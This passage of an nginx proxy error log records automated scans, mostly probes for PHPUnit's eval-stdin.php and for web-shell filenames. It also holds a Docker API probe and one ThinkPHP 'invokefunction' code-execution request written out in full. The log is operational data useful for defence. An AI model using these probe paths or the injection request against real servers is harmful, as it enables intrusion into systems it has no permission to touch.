"/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:27 [error] 363#363: *239916 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:37 [error] 363#363: *239916 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:37 [error] 363#363: *239916 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:37 [error] 363#363: *239916 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:38 [error] 363#363: *239916 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:39 [error] 363#363: *239916 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:39 [error] 363#363: *239916 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:40 [error] 363#363: *239916 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:45 [error] 363#363: *239916 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:46 [error] 363#363: *239916 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:46 [error] 363#363: *239916 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:47 [error] 363#363: *239916 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:50 [error] 363#363: *239916 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:50 [error] 363#363: *239916 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:52 [error] 363#363: *239916 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:53 [error] 363#363: *239916 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:53 [error] 363#363: *239916 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:54 [error] 363#363: *239916 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:55 [error] 363#363: *239916 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:56 [error] 363#363: *239916 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:56 [error] 363#363: *239916 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:58 [error] 363#363: *239916 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:59 [error] 363#363: *239916 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:52:59 [error] 363#363: *239916 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:00 [error] 363#363: *239916 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:01 [error] 363#363: *239916 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:02 [error] 363#363: *239916 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:02 [error] 363#363: *239916 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:06 [error] 363#363: *239916 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:06 [error] 363#363: *239916 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:07 [error] 363#363: *239916 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:07 [error] 363#363: *239916 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:09 [error] 363#363: *239916 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:10 [error] 363#363: *239916 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:10 [error] 363#363: *239916 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:11 [error] 363#363: *239916 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 04:53:12 [error] 363#363: *239916 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 180.76.172.156, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 05:03:06 [error] 363#363: *239919 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.94, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "92.249.249.197" +2026/01/17 05:05:29 [error] 365#365: *241408 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.94, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "92.249.249.197" +2026/01/17 05:46:13 [error] 366#366: *241417 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "92.249.249.197" +2026/01/17 06:48:29 [error] 366#366: *241447 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 07:06:17 [error] 363#363: *241452 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "92.249.249.197" +2026/01/17 07:07:13 [error] 363#363: *241454 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:13 [error] 363#363: *241454 open() "/var/www/html/blue.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /blue.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:13 [error] 363#363: *241454 open() "/var/www/html/fang.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /fang.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/an7.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /an7.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/f7.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /f7.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/wp-admin/images/commentv.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/commentv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/function/function.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //function/function.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/cgi-bin/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //cgi-bin/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/wp-includes/fonts/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/fonts/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/wp-admin/images/wp-conflg.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/images/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:14 [error] 363#363: *241454 open() "/var/www/html/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/ss1.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ss1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/assets/css/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //assets/css/index.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //goods.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //admin.php?fm=true HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/abcd.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /abcd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 "/var/www/html/wp-includes/blocks/code/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/code/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:15 [error] 363#363: *241454 open() "/var/www/html/adminfuns.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //adminfuns.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 open() "/var/www/html/ioxi-o.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 open() "/var/www/html/goat.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /goat.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 "/var/www/html/wp-includes/PHPMailer/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/PHPMailer/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 open() "/var/www/html/xx.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /xx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 "/var/www/html/.well-known/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.well-known/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 open() "/var/www/html/wp-admin/js/wp-conflg.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/wp-conflg.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 open() "/var/www/html/f5.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /f5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:16 [error] 363#363: *241454 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /doc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/xtride.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /xtride.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/flower.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /flower.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/flower2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /flower2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/f6.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //f6.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/edit.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //edit.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/aa.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //aa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 open() "/var/www/html/ext.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ext.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:17 [error] 363#363: *241454 "/var/www/html/wp-includes/js/dist/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/js/dist/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 "/var/www/html/wp-includes/SimplePie/index.html" is not found (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/SimplePie/ HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/av.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //av.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/wp-includes/Text/Diff/Engine/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/wsd.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wsd.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/sadd5.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /sadd5.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/wp-content/themes/deeto/login.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/deeto/login.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/file48.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /file48.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/wp-admin/css/colors/blue/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/blue/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:18 [error] 363#363: *241454 open() "/var/www/html/ot.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ot.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/css.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /css.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /alfa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/inputs.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /inputs.php? HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/xxxx.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /xxxx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/wp-includes/rest-api/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/rest-api/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/class.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //class.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:19 [error] 363#363: *241454 open() "/var/www/html/wp-admin/css/colors/midnight/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/midnight/about.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/gec.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gec.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/f35.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/wp-admin/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/pp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /pp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/update/f35.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /update/f35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //lock360.php 